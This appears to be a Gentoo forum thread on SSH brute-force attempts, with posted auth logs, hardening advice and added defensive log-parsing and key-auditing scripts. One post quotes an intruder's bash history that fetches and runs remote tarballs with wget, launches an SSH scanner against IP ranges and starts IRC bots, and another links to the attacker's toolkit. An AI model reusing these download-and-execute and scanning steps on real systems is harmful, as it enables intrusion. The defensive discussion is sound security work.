Sep  4 20:36:00 [sshd] error: Could not get shadow information for NOUSER

Sep  4 20:36:00 [sshd] Failed password for illegal user user from 213.239.58.119 port 3048 ssh2

Sep  4 20:36:01 [sshd] Failed password for root from 213.239.58.119 port 3100 ssh2

Sep  4 20:36:02 [sshd] Failed password for root from 213.239.58.119 port 3122 ssh2

Sep  4 20:36:04 [sshd] Failed password for root from 213.239.58.119 port 3163 ssh2
```

 I'm going to go into my config and disallow all sshd logins except for my own (including root)
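Logs like the ones posted above are easy to summarise per source, as an added example that is not from the thread: a shell function that totals the sshd "Failed password" lines per address, covering both log styles seen here (metalog's "[sshd]" prefix and syslog-ng's "host sshd[pid]:" prefix), run over a constructed sample with documentation addresses rather than real hosts.

```shell
#!/bin/sh
# Added example (not from the thread): total the sshd "Failed password"
# lines per source address so a brute-force source like the ones posted
# above stands out. Handles both log styles seen in this thread, metalog's
# "[sshd]" prefix and syslog-ng's "host sshd[pid]:" prefix, and strips the
# "::ffff:" that OpenSSH prefixes to IPv4 clients on an IPv6 socket.

# Constructed sample log (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG='Sep  4 20:35:53 [sshd] Illegal user test from 203.0.113.7
Sep  4 20:35:54 [sshd] error: Could not get shadow information for NOUSER
Sep  4 20:35:54 [sshd] Failed password for illegal user test from 203.0.113.7 port 2898 ssh2
Sep  4 20:35:55 [sshd] Failed password for guest from 203.0.113.7 port 2944 ssh2
Sep  4 20:36:01 [sshd] Failed password for root from 203.0.113.7 port 3100 ssh2
Sep  4 20:36:02 [sshd] Failed password for root from 203.0.113.7 port 3122 ssh2
Jul 15 20:49:44 pop sshd[19198]: Failed password for illegal user test from ::ffff:198.51.100.23 port 34406 ssh2
Sep  2 09:32:09 calista sshd[13685]: Failed password for invalid user root from 192.0.2.44 port 53755 ssh2
Sep  2 09:32:14 calista sshd[13690]: Failed password for invalid user root from 192.0.2.44 port 54013 ssh2
Sep  2 09:32:30 calista sshd[13710]: Failed password for invalid user test from 192.0.2.44 port 49365 ssh2
Sep  2 10:00:00 calista sshd[13720]: Accepted publickey for alice from 192.168.0.2 port 40000 ssh2'

# ssh_failures_by_ip: read sshd log lines on stdin, print "COUNT IP USERS"
# per source, most failures first; USERS lists the distinct account names
# tried from that address, in the order they were first seen.
ssh_failures_by_ip() {
    awk '
    /Failed password for/ {
        ip = ""; user = ""
        for (i = 2; i <= NF; i++)
            if ($i == "from") { ip = $(i + 1); user = $(i - 1) }
        if (ip == "") next
        sub(/^::ffff:/, "", ip)          # IPv4-mapped address -> plain IPv4
        fails[ip]++
        key = ip SUBSEP user
        if (!(key in seen)) {
            seen[key] = 1
            users[ip] = (users[ip] == "" ? user : users[ip] "," user)
        }
    }
    END { for (ip in fails) printf "%d %s %s\n", fails[ip], ip, users[ip] }
    ' | sort -k1,1nr -k2,2
}

# ssh_brute_sources THRESHOLD: addresses with at least THRESHOLD failures,
# one per line, ready to feed into whois or a firewall block list.
ssh_brute_sources() {
    ssh_failures_by_ip | awk -v t="$1" '$1 >= t { print $2 }'
}

# Demonstration on the sample; on a metalog box the input would be
# /var/log/everything/current (syslog-ng: /var/log/messages).
printf '%s\n' "$SAMPLE_LOG" | ssh_failures_by_ip
echo "--- sources with 3 or more failures ---"
printf '%s\n' "$SAMPLE_LOG" | ssh_brute_sources 3
```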

----------

## BlinkEye

is anyone out there who knows enough about iptables to drop OUTGOING connections and only allow specific ports/connection? would increase security in case windows boxes are behind the server (in case someone gets a nasty trojan or worm). i've started a thread here but gave up because i couldn't get any further ... https://forums.gentoo.org/viewtopic.php?t=214730&start=0&postdays=0&postorder=asc&highlight=

----------

## Suicidal

 *bcore wrote:*   

> Unfortunately I don't get a static IP from work, but I'm thinking I'm gonna set sshd up to only allow key logins, since I use keychain from work. I've already also got it set up do disallow root logins, so I figure I should be reasonably safe...

 

You could do that, and even though you don't have a static IP at work you could always set your entire work subnet in hosts.allow since sshd does use tcp wrappers. I have all of mine at work set this way even though they are not accessible from the internet.

----------

## michrech

But I've been seeing these attacks as well from the following IPs:


Well, going through, there are many.  Checking most of these shows that they are not assigned in America.  Don't know that it means anything..

----------

## hex4def6

heh - I just saw this post - adding my 2c.

I'm getting the same illegal logins for NOUSER etc - the IPs that have attempted it so far:

140.109.82.84

blue.earth.sinica.edu.tw

218.235.97.206

Time to start a counter attack fellow gentooers?   :Laughing: 

----------

## dalek

 *hex4def6 wrote:*   

> 
> 
> Time to start a counter attack fellow gentooers?  

 

I bet we can't do much of anything, legally, to them since they are over there in Taiwan.  I would also bet that if me and you did the same, we would only have our feet sticking out from under the jail.  ( remember the old wicked witch.  :Idea:  )  They don't mind attacking us, but we get in trouble for attacking them.

Of course, I would like to see their data pipe smoke though, computer too for that matter.

I say we switch everybody to Linux and run those bastards, crackers that is, off the planet.  Linux is way too secure for them to last long, just have to weed out the computer idiots.    :Twisted Evil:    "I'll just login as root and surf the web."   :Shocked:  Those idiots.

Later

 :Very Happy:   :Very Happy:   :Very Happy:   :Very Happy: 

----------

## Art Vandalay

damn, thanks for the heads up....having a look in my logfiles reveals the same shit going on...i.e. the cheeky bastards are trying to log on as test, root and guest

```
Sep  2 09:32:09 calista sshd[13685]: Failed password for invalid user root from 66.236.24.228 port 53755 ssh2
Sep  2 09:32:14 calista sshd[13690]: Failed password for invalid user root from 66.236.24.228 port 54013 ssh2
Sep  2 09:32:18 calista sshd[13695]: Failed password for invalid user root from 66.236.24.228 port 54276 ssh2
Sep  2 09:32:23 calista sshd[13700]: Failed password for invalid user root from 66.236.24.228 port 54539 ssh2
Sep  2 09:32:27 calista sshd[13705]: Failed password for invalid user root from 66.236.24.228 port 54799 ssh2
Sep  2 09:32:30 calista sshd[13710]: Failed password for invalid user test from 202.64.28.81 port 49365 ssh2
Sep  2 09:32:32 calista sshd[13715]: Failed password for invalid user root from 66.236.24.228 port 55067 ssh2
Sep  2 09:32:34 calista sshd[13720]: Failed password for invalid user guest from 202.64.28.81 port 49431 ssh2
Sep  2 12:36:07 calista sshd[13725]: Failed password for invalid user test from 203.197.175.233 port 38610 ssh2
Sep  2 12:36:15 calista sshd[13730]: Failed password for invalid user guest from 203.197.175.233 port 38674 ssh2
Sep  2 14:44:32 calista sshd[13736]: Failed password for invalid user test from 203.197.175.233 port 44133 ssh2
Sep  2 14:44:40 calista sshd[13741]: Failed password for invalid user guest from 203.197.175.233 port 44187 ssh2
Sep  3 12:13:29 calista sshd[10394]: Failed password for invalid user test from 211.184.51.3 port 35228 ssh2
Sep  3 12:13:35 calista sshd[10399]: Failed password for invalid user guest from 211.184.51.3 port 35335 ssh2
Sep  3 12:13:41 calista sshd[10404]: Failed password for invalid user admin from 211.184.51.3 port 35466 ssh2
Sep  3 12:13:47 calista sshd[10409]: Failed password for invalid user admin from 211.184.51.3 port 35609 ssh2
Sep  3 12:13:54 calista sshd[10414]: Failed password for invalid user user from 211.184.51.3 port 35770 ssh2
Sep  3 12:14:00 calista sshd[10419]: Failed password for invalid user root from 211.184.51.3 port 35948 ssh2
Sep  3 12:14:05 calista sshd[10424]: Failed password for invalid user root from 211.184.51.3 port 36142 ssh2
Sep  3 12:14:12 calista sshd[10429]: Failed password for invalid user root from 211.184.51.3 port 36312 ssh2
Sep  3 12:14:17 calista sshd[10434]: Failed password for invalid user test from 211.184.51.3 port 36482 ssh2
```

and that's just a small part of it....it started on sep 2, 3, 7 and 9th.

logging on as root is disabled but i think i'll restrict sshing to my box from  just my work ip from now on.

a sobering reminder to all of us to implement a firewall and follow basic linux security principles as no one is exempt from being attacked.

----------

## BlinkEye

with

```
whois ipaddress
```

or

```
whois domainname
```

you see who owns a domainname i.e. an ip address. some of them are providers which do have an abuse@ip-address, abuse@domainname. maybe it would help dropping a mail?

----------

## C0deM0nkey

Maybe we could setup a simple database with the ipaddresses that are attempting these logins, with the time and date of the attempts and then fellow gentooers and server admins can use the db to restrict access to servers and/or services, admins at isp's could probably use the db to quickly identify customers' machines within their ip range that may be compromised. Any ideas?

-Code Monkey

----------

## BlinkEye

good idea. the first thing we'd need would be a grep command which sorts out these login attempts.
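A small parser that does what that grep would do and goes one step further, as an added example (my own code, not something from this thread or from any tool mentioned in it): it extracts failed-login events from the three sshd wordings quoted in this thread, aggregates them per source address with first/last seen and the usernames tried, and flags sources that reached a threshold. The rows it produces are the shape of record the shared database suggested a couple of posts up would hold. The log lines are constructed to match the formats quoted here, with documentation-range addresses; the host names and the threshold of 3 are arbitrary.

```python
"""Pull failed sshd logins out of a syslog file and summarize them per source.

Added example, not code from this thread or from any tool mentioned in it.
The SAMPLE_LOG lines are constructed to mirror the formats quoted in the
thread (BSD syslog timestamp; "invalid user", "illegal user" and plain-user
variants; an IPv4-mapped IPv6 source) and use documentation addresses.
"""
import re
from datetime import datetime

# Constructed sample log (not real data); one non-sshd line is included to
# show that unrelated lines are ignored.
SAMPLE_LOG = """\
Sep  2 09:32:09 calista sshd[13685]: Failed password for invalid user root from 198.51.100.7 port 53755 ssh2
Sep  2 09:32:14 calista sshd[13690]: Failed password for invalid user root from 198.51.100.7 port 54013 ssh2
Sep  2 09:32:30 calista sshd[13710]: Failed password for invalid user test from 203.0.113.9 port 49365 ssh2
Sep  2 09:32:34 calista sshd[13720]: Failed password for invalid user guest from 203.0.113.9 port 49431 ssh2
Sep  7 17:34:54 SPUTNIK2 sshd[8950]: Failed password for root from 198.51.100.7 port 46410 ssh2
Sep 10 01:47:40 SPUTNIK2 sshd[15452]: Illegal user test from 192.0.2.44
Sep 10 01:47:40 SPUTNIK2 sshd[15452]: Failed password for illegal user test from 192.0.2.44 port 58978 ssh2
Sep 10 01:47:40 SPUTNIK2 syslog-ng[5924]: STATS: dropped 0
Oct 31 06:20:11 [sshd] Failed password for invalid user test from ::ffff:192.0.2.44 port 48325 ssh2
"""

# One regex covers the three wordings seen in the thread. The "Illegal user"
# line that precedes a failure is deliberately not matched: it would double
# count the same attempt.
FAILED_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) .*?"
    r"Failed password for (?:(?:invalid|illegal) user )?(?P<user>\S+) "
    r"from (?:::ffff:)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)


def parse_failed_logins(text):
    """Yield (timestamp, username, source_ip) for each failed password line.

    Syslog timestamps carry no year, so strptime fills in 1900; that is fine
    for ordering events within one log file.
    """
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m is None:
            continue  # other sshd messages and non-sshd lines
        ts = datetime.strptime(f"{m['mon']} {m['day']} {m['time']}", "%b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]


def summarize(text, threshold=3):
    """Aggregate failures per source: count, first/last seen, usernames tried.

    'flagged' marks sources whose count reached `threshold`, the kind of rule
    a brute-force detector acts on before blocking.
    """
    stats = {}
    for ts, user, ip in parse_failed_logins(text):
        rec = stats.setdefault(ip, {"count": 0, "first": ts, "last": ts, "users": set()})
        rec["count"] += 1
        rec["first"] = min(rec["first"], ts)
        rec["last"] = max(rec["last"], ts)
        rec["users"].add(user)
    for rec in stats.values():
        rec["flagged"] = rec["count"] >= threshold
    return stats


def to_records(stats):
    """Flatten the summary into rows (ip, count, first, last, users, flagged),
    busiest source first: the shape a shared blocklist database would store."""
    rows = []
    for ip, rec in sorted(stats.items(), key=lambda kv: (-kv[1]["count"], kv[0])):
        rows.append((ip, rec["count"],
                     rec["first"].strftime("%b %d %H:%M:%S"),
                     rec["last"].strftime("%b %d %H:%M:%S"),
                     ",".join(sorted(rec["users"])), rec["flagged"]))
    return rows


if __name__ == "__main__":
    for row in to_records(summarize(SAMPLE_LOG)):
        print(*row, sep="\t")
```

The timestamps have no year, so the script only orders events within one file; a collector that stores rows for sharing would add the year and the reporting host before writing them out.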

----------

## fleed

Have a look at this goody! I'm still testing it at home but it looks good so far.

http://r-fx.org/bfd.php

----------

## BlinkEye

if this is your page: i get a forbidden error!

----------

## fleed

No, it's not. I think I got that when I took a direct link as well. Try first going to r-fx.org then clicking on projects then bfd.

----------

## BlinkEye

i tried of course. i get a 403 anyway. but i'll keep going back, no problem. i'm curious what this all is about

----------

## tspse

 *BlinkEye wrote:*   

> i tried of course. i get a 403 anyway. but i'll keep going back, no problem. i'm curious what this all is about

 

i can access it by the link directly, no problems here.

----------

## BlinkEye

 *tspse wrote:*   

>  *BlinkEye wrote:*   i tried of course. i get a 403 anyway. but i'll keep going back, no problem. i'm curious what this all is about 
> 
> i can access it by the link directly, no problems here.

 

you only get a 403 error when trying to access it with good old beloved konqui. i don't like that! thanks for the hint (i launch firefox only when absolutely necessary)

----------

## Jeremy_Z

Is it "useful"? If someone is stupid enough to have a root:root or forgot that he had a test:test account, it won't protect him.

Just have a strong password, more than 10 chars should be good enough against brute force attacks.

Still, the best way is to have the port stealth.

----------

## G.N.A.

 *Code Monkey wrote:*   

> Maybe we could setup a simple database with the ipaddresses that are attempting these logins, with the time and date of the attempts and then fellow gentooers and server admins can use the db to restrict access to servers and/or services, admins at isp's could probably use the db to quickly identify customers machines within there ip range that maybe compromised. Any ideas?
> 
> -Code Monkey

 

Check out Dshield. www.dshield.com

I send them my daily router logs. They compile a list of the worst abusers and send an automated email to the @abuse accounts for these ISPs.

GNA

----------

## skaven

 *ReneeTeunissen wrote:*   

>  *evoweiss wrote:*   Another thing I did was invest in a hardware firewall (Zywall 1 model) which will send me an email whenever there are any events whether legitimate (me ssh'ing into my system from work) or illegitimate (attacks on my system, other attempt to gain access via ssh). I highly recommend the same to others. 
> 
> guess what the firewall is running. There are no such things as hardware firewalls. You bought a small single board PC like device with some network in and outputs - with linux, bsd or any embedded OS on it - which just does IP filtering as ipfilter/netfilter does.
> 
> Because these things run - mostly - on non-intel CPUs it is probably more secure against trojans and other precompiled hacker-stuff, but that's about all. 
> ...

 

I would have to argue about there not being hardware firewalls. Filtering can be moved off to an ASIC (such as with SonicWaLL ISAs), just as encryption/decryption often is. Whatever the device itself uses as an OS never has to actually look at the incoming or outgoing traffic from a firewall perspective. The OS would just have to load the rulesets into memory. Granted, these Netgear and Linksys type firewall/router combos are way too low-end to have anything even close to that level of sophistication and it would likely be prohibitively expensive to get all the bells and whistles of a firewall like Checkpoint NG all into hardware, but it can be done.

----------

## Sputnik66

hm... this is kind of startling. I was browsing the boards for a way to monitor my other box with root-tail because of the -constant- breakin attempts i have been getting lately on my 2nd linux box. i figured i could throw root-tail on my 2nd monitor for the server, and have root-tail on the first monitor for this machine.

anyhow i guess i'm not being specifically attacked as i read through this entire thread lol.

here's what i have been getting lately:

 *Quote:*   

> Sep  7 17:34:54 SPUTNIK2 sshd[8950]: Failed password for root from 210.52.66.56 port 46410 ssh2
> 
> Sep  7 17:34:57 SPUTNIK2 sshd[8952]: Failed password for root from 210.52.66.56 port 46617 ssh2
> 
> Sep  7 17:35:00 SPUTNIK2 sshd[8954]: Failed password for root from 210.52.66.56 port 46811 ssh2
> ...

 

that goes on and on. exactly 351 lines in the same time frame.

```
Sep  8 09:14:13 SPUTNIK2 sshd[12585]: Did not receive identification string from 61.166.155.162
Sep  9 11:55:21 SPUTNIK2 sshd[14506]: Did not receive identification string from 210.107.239.79
Sep 10 01:47:40 SPUTNIK2 sshd[15452]: Illegal user test from 130.149.64.97
Sep 10 01:47:40 SPUTNIK2 syslog-ng[5924]: STATS: dropped 0
Sep 10 01:47:40 SPUTNIK2 sshd[15452]: error: Could not get shadow information for NOUSER
Sep 10 01:47:40 SPUTNIK2 sshd[15452]: Failed password for illegal user test from 130.149.64.97 port 58978 ssh2
Sep 10 01:47:41 SPUTNIK2 sshd[15454]: User guest not allowed because shell /dev/null is not executable
Sep 10 01:47:42 SPUTNIK2 sshd[15454]: error: Could not get shadow information for NOUSER
Sep 10 01:47:42 SPUTNIK2 sshd[15454]: Failed password for illegal user guest from 130.149.64.97 port 58990 ssh2
Sep 10 07:40:48 SPUTNIK2 sshd[15862]: scanned from 24.75.10.56 with SSH-1.0-SSH_Version_Mapper.  Don't panic.
Sep 10 07:40:48 SPUTNIK2 sshd[15861]: Did not receive identification string from 24.75.10.56
Sep 11 09:15:02 SPUTNIK2 sshd[21105]: Illegal user test from 211.223.201.156
Sep 11 09:15:02 SPUTNIK2 syslog-ng[5924]: STATS: dropped 0
Sep 11 09:15:02 SPUTNIK2 sshd[21105]: error: Could not get shadow information for NOUSER
Sep 11 09:15:02 SPUTNIK2 sshd[21105]: Failed password for illegal user test from 211.223.201.156 port 3002 ssh2
Sep 11 09:15:04 SPUTNIK2 sshd[21107]: User guest not allowed because shell /dev/null is not executable
Sep 11 09:15:04 SPUTNIK2 sshd[21107]: error: Could not get shadow information for NOUSER
Sep 11 09:15:04 SPUTNIK2 sshd[21107]: Failed password for illegal user guest from 211.223.201.156 port 3072 
Sep 13 22:27:58 SPUTNIK2 sshd[15877]: Failed password for root from 81.58.5.35 port 3069 ssh2
Sep 13 22:28:01 SPUTNIK2 sshd[15879]: reverse mapping checking getaddrinfo for unlabelled-35-5-58-81.versatel.net failed - POSSIBLE BREAKIN ATTEMPT!
Sep 13 22:28:01 SPUTNIK2 sshd[15879]: Failed password for root from 81.58.5.35 port 3094 ssh2
Sep 13 22:28:04 SPUTNIK2 sshd[15881]: reverse mapping checking getaddrinfo for unlabelled-35-5-58-81.versatel.net failed - POSSIBLE BREAKIN ATTEMPT!
Sep 13 22:28:04 SPUTNIK2 sshd[15881]: Failed password for root from 81.58.5.35 port 3112 ssh2
Sep 13 22:28:06 SPUTNIK2 sshd[15883]: Illegal user test from 81.58.5.35
Sep 13 22:28:06 SPUTNIK2 sshd[15883]: reverse mapping checking getaddrinfo for unlabelled-35-5-58-81.versatel.net failed - POSSIBLE BREAKIN ATTEMPT!
Sep 13 22:28:06 SPUTNIK2 sshd[15883]: error: Could not get shadow information for NOUSER
```

this isn't even 20% of it.. it's all endless basically, and starting to get irritating.

i have been recording IPs lately. so far my list has:

```
81.58.5.35
210.52.66.56
210.107.239.79
130.149.64.97
211.223.201.156
80.138.248.157
24.75.10.56
```

most of the attacks keep repeating and i'm ready to just block the IPs. it's rare a new IP shows up.

----------

## M4554KK3R

 *BlinkEye wrote:*   

>  *many users wrote:*   lot's of quotes omitted here  
> 
> i'm still very much interested in that feature because i use openSSH too! any hint?

 

dunno if this is what you want, but man 5 sshd_config tells you

```
UseDNS

Specifies whether sshd should lookup the remote host name and check that the resolved host name for the remote IP address maps back to the very same IP address.  The default is ``yes''.
```

this is also a problem if you try to login via a dyndns-ip because you try to login from foo.dyndns.org (or homelinux or whatever) but your ip number translates back to your.foo.isp.com and you're kicked out

----------

## CarlUman

 *Valhlalla wrote:*   

> My system is set up to email me any failed logins, but since I'm paranoid I'm going to check anyway 

 

I might have missed it but could you tell me how this is done.

Thanks much

Carl

----------

## evoweiss

Hi all,

This continues to be a good thread and I recently had a number of attempted break-ins from somebody on the Roadrunner system (whois is your friend  :Smile: ).

Anyway, the latest attempts all were trying to login as mysql. There is a mysql user that can be set up, but I've got it disabled on my box as I am not running mysql. If you are, by chance, running mysql, you may want to change passwords, make sure you're up to date, etc.

Incidentally, while it's hard to go after these folks legally (especially if they're in other countries), I have found that emailing their ISPs a polite request that they do something to stop the behavior (and emailing them all the relevant information, i.e., your IP address, the log files, etc.) is very effective. Most of the time, especially with hack attempts coming from Asian countries, I never hear from the ISP, but the attacks stop. I suspect many attacks are using compromised accounts and that, when notified, the ISPs notify the owner of the account or box and get them to fix whatever the problem is.

I do like the idea of keeping a record of where attacks come from, especially as it might be useful to block some particularly troublesome ISPs. One could probably write up a nice paper with all that information.

Best,

Alex

----------

## C0deM0nkey

Hi all,

I know this thread has basically been abandoned, but I feel that it is a good thread and surprisingly enough, one of my servers has received unauthorised ssh access attempts for 1 week now.

Each day it's a different ip address, generally it's in Asia, but occasionally it's in Europe or the US. It appears to be either a script or a worm. And mostly it attempts to login using common service names and common names.

In response to this ssh has been disabled for root and all users except 1 user. The 1 user that can login is an obscure username I made up, and this user is a member of the wheel group.

Previously, when I first noticed the access attempts, there were also ftp access attempts from the same machines. So I have also completely removed ftp for the time being, given that there is only 1 active domain on the system, and I know all the members of that domain, I have informed all users that ftp has been restricted and to email me files that need to be ftp'd and I will put the file(s) up for them.

I have a list of a handful of ip addresses, which as I said changes daily, and am happy to share them with the group, I can also provide my logwatch emails for anyone that may find them useful.

Since the ip addresses change daily to different parts of the world blocking these ip's individually on my box seems futile, the ip's aren't listed on dshield as known compromised machines either. So at the moment I'm playing chase, each morning I check my logs, look up the ip and the correct IANA database and email the appropriate admins.

Has anyone got any further ideas to help me (a) lockdown the box (b) stop these attempts occurring, since they do concern me.

Many Thanks, Code Monkey

----------

## infecticide

Looks like they're trying me now. 

```
Oct 31 06:20:09 [sshd(pam_unix)] authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=212.100.
Oct 31 06:20:11 [sshd] Failed password for invalid user test from ::ffff:212.100.197.34 port 48325 ssh2
```

----------

## xbmodder

wow anyone know what virus this is? i got myself hacked:

bash hist:

```
su - root
mkdir .ssh
w
hostname
cd /var/tmp/
wget
wget carmelog.go.ro/do.tgz
rm -rf no_user.phtml
wget carmelo.go.ro/do.tgz
tar zxvf do.tgz
rm -rf do.tgz
chmod +x do
./do
./do
rm -rf do
wget carmelo.go.ro/90
chmod +x 90
./90
rm -rf 90
passwd
wget antohi.home.ro/okas.tgz
mv okas.tgz /var/tmp/
tar zxvf okas.tgz
rm -rf okas.tgz
cd okas
./assh 64.24
w
cd /var/tmp/
wget antohi.home.ro/ryo.tar.gz
tar zxvf ryo.tar.gz
rm -rf ryo.tar.gz
cd .access.log
./config baronu 112233
./duck
./run
cd ..
cd okas
./assh 166.70
./assh 166.71
./assh 67.117
w
cd /var/tmp/
cd okas
./assh 64.24
cd /var/tmp/
cd okas
./assh 69.137
./assh 218.110
./assh 218.111
./assh 218.112
./assh 218.114
./assh 218.116
cd /var/tmp/
cd okas
./assh 218.101
./assh 218.102
./assh 218.103
w
cd /var/tmp/
wget scaryx.home.ro/clone.tgz
tar zxvf clone.tgz
rm -rf clone.tgz
cd mirkforce/
ls
pico id
./mirkforce
/load miami.fl.us.undernet.org 6667 500 0
ls
cd ..
rm -rf mirkforce
wget www.nirvana.as.ro/emech.tar.gz
tar zxvf emech.tar.gz
rm -rf emech.tar.gz
cd .emech/
ls
./m
./m
./m
./m
./m
./m
cd /var/tmp/
cd okas
./assh 212.118.
./assh 212.118
./assh 212.119
./assh 212.202
./assh 212.113
./assh 212.203
./assh 212.204
w
cd /etc/mysql/my.cnf
cd /var/tmp/
cd emech
ls -all
cd .emech
ls
./m
cd ..
cd okas
./assh 66.165
cd /var/tmp/
cd okas
./assh 66.165
./assh 66.166
cd /var/tmp/
cd okas
./assh 66.166
./assh 66.167
cd /var/tmp/
cd okas
./assh 210.179
./assh 210.179
cd /var/tmp/
w
cd okas
./assh 200.178
cd /vbar/tmp/
cd okas
cd /var/tmp/.
cd okas
./assh 213.172
cd /var/tmp/. /var/tmp/.
cd okas
./assh 66.207
./assh 66.208
```

I think it's a script made to look stupid!

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2SbC35l5mJgI67YiZEJbRMxoQyHZSitHAxdGm \

CwFs2ah5Da3B2uPs5ufqTVw7bdPIKQ0gbulQItvhO26GzdYK1I7aFBe+P0fZsPyKR/9+Y \

etUmGE96iTa3ShvscAjULdsTPetaMEcfBSqueUTBW2/JdDFgJgoLAf1HhhREfnGJE= test

mod edit: fixed problem with linewrapping of ssh-rsa key.

amne

this guy left all of the attack on my system, do you guys want it (seems like he was in the middle)? u guys want it? i have secured everything. i'm sorry for everyone i damaged. i saw the log of everyone i managed to hack, quite impressive actually.

we need this bug

----------

## xbmodder

here are all the files: 

http://xbmodder.us/for.tar.bz2

w00t

----------

## Parasietje

I protected my sshd by only allowing my main user from the internet. Root is allowed from the clients that have a DNS address in my local lan. Only certain MAC-addresses get a Dynamic DNS address.

That way, even with physical access to my network, you can't log in as root.

----------

## amne

xbmodder: Judging from the logs it is hard to tell how far he got. Seems he tried to get root access, hard to tell if he was successful. He also tried to install some irc-client that listens to commands (zombie).

Where did you find the "ssh-rsa AAAAB3NzaC1y..."-string? It looks like an authorized_keys(2) file, that allows logins without typing a password in ssh.
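Since an unexpected authorized_keys entry is exactly how a passwordless login gets left behind, here is an audit script as an added example (my own code, not from this thread or from OpenSSH): it parses each line of an authorized_keys file, checks that the key type declared on the line matches the type stored inside the base64 blob, computes the SHA256 fingerprint in the form ssh-keygen -l prints, and compares it with a list of fingerprints the administrator installed. The key material is constructed (make_blob builds tiny, non-functional ssh-rsa blobs so the parser has wire-format input); the file contents, the comments and the allowlist are assumptions for the demonstration, not taken from the thread.

```python
"""Audit an authorized_keys file against a list of known key fingerprints.

Added example, not code from this thread. The keys below are constructed:
make_blob() builds tiny, non-functional ssh-rsa blobs in the SSH wire
format (length-prefixed type, exponent, modulus) so the parser has
realistic input. Fingerprints are in OpenSSH's SHA256 form: base64 of the
SHA-256 digest of the raw blob, padding stripped.
"""
import base64
import binascii
import hashlib
import struct

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def make_blob(key_type: bytes, *fields: bytes) -> str:
    """Constructed helper: base64 of an SSH wire-format blob (not a usable key)."""
    raw = b"".join(struct.pack(">I", len(f)) + f for f in (key_type, *fields))
    return base64.b64encode(raw).decode()


# Constructed sample data: a key the admin installed, a key dropped by an
# intruder with the comment "test", and a line whose declared type does not
# match the blob it carries.
ADMIN_KEY = make_blob(b"ssh-rsa", b"\x01\x00\x01", b"\x00\xc3" + bytes(range(1, 40)))
INTRUDER_KEY = make_blob(b"ssh-rsa", b"\x01\x00\x01", b"\x00\xd7" + bytes(range(40, 80)))
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# admin laptop",
    "ssh-rsa " + ADMIN_KEY + " admin@laptop",
    "",
    "ssh-rsa " + INTRUDER_KEY + " test",
    'command="/usr/bin/uptime",no-pty ssh-ed25519 ' + ADMIN_KEY + " wrong-type",
])


def fingerprint(raw: bytes) -> str:
    """OpenSSH-style SHA256 fingerprint of a decoded key blob."""
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


# The admin's allowlist: the fingerprint of the one key they installed.
ALLOWLIST = {fingerprint(base64.b64decode(ADMIN_KEY))}


def parse_authorized_keys(text):
    """Yield (lineno, options, key_type, raw_blob_or_None, comment).

    Assumption: options, when present, contain no whitespace inside quotes;
    the real sshd parser tolerates that, this simplified one does not.
    """
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            yield lineno, "", "", None, line  # no recognisable "type blob" pair
            continue
        options = " ".join(tokens[:idx])
        key_type, b64 = tokens[idx], tokens[idx + 1]
        comment = " ".join(tokens[idx + 2:])
        try:
            raw = base64.b64decode(b64, validate=True)
        except binascii.Error:
            raw = None
        yield lineno, options, key_type, raw, comment


def embedded_type(raw: bytes) -> str:
    """The key type string stored inside the blob (its first length-prefixed field)."""
    if len(raw) < 4:
        return ""
    n = struct.unpack(">I", raw[:4])[0]
    return raw[4:4 + n].decode("ascii", "replace")


def audit(text, known_fingerprints):
    """Return (lineno, verdict, fingerprint, comment, options) for every key line.

    verdict: 'known' if the fingerprint is in the allowlist, 'UNKNOWN' if it is
    a well-formed key that nobody installed, 'MALFORMED' otherwise.
    """
    report = []
    for lineno, options, key_type, raw, comment in parse_authorized_keys(text):
        if raw is None or embedded_type(raw) != key_type:
            report.append((lineno, "MALFORMED", "", comment, options))
            continue
        fp = fingerprint(raw)
        verdict = "known" if fp in known_fingerprints else "UNKNOWN"
        report.append((lineno, verdict, fp, comment, options))
    return report


if __name__ == "__main__":
    for entry in audit(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        print(*entry, sep="\t")
```

Run it against every home directory's .ssh/authorized_keys (and authorized_keys2 on older installations) with an allowlist built from the fingerprints of keys you generated yourself; any UNKNOWN or MALFORMED row is a line somebody else wrote, and the options column shows whether it is also restricted to a forced command.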

----------

## venquessa2

Interesting thread, just throwing my 2 pence in.

iptables firewall is a good start, although the posted example back on page 1 or 2 is OTT, there is no need what so ever for all those drops, just set the INPUT and/or FORWARD chains to default DROP policy, then enable specific ports you want.  The filtering of bad flags and syn floods etc I didn't know about, thanks.  For firewalls connecting lans to the net using NAT (or MASQing) a good set of rules should be added to prevent IP to IP packets that "can't" exist, to help catch firewall spoofs, eg.  DROP all localhost that isn't from localhost, drop all LAN ips coming from the WAN interface and so on.

iptables firewall will not help if you want to have an insecure service open.  sshd is as insecure as telnet if you have insecure user accounts and/or passwords.  If you are not using a service close it.  If you are not using a user account delete the password, scramble it by adding rubbish into /etc/shadow in place of the password, or set the shell to /bin/false or /dev/null

If you require sshd logins, do as suggested elsewhere and only allow from specific IPs.  If you can't and want to log in with putty from various places, like on a laptop dialup account, then consider a knock-knock trapdoor.  The trick is you firewall the sshd port, DROP, but run a service on an unregistered port that accepts an odd and unique challenge, NOT a protocol or password challenge, if successful it opens the sshd port for 20 seconds and then closes it to SYNs again.  All you need is a little perl know-how and it's not that tricky.

DON'T allow sshd root logins!  The option is in /etc/ssh/sshd.conf

Be careful about allowing trusted user accounts ssh access, users that can for example su with no password.

And finally some food for thought for all those who patiently searched through their logs....

Do you honestly think that if the person attacking actually got your root password that the 

"Accepted password for root from 81.x.x.x port 1058"

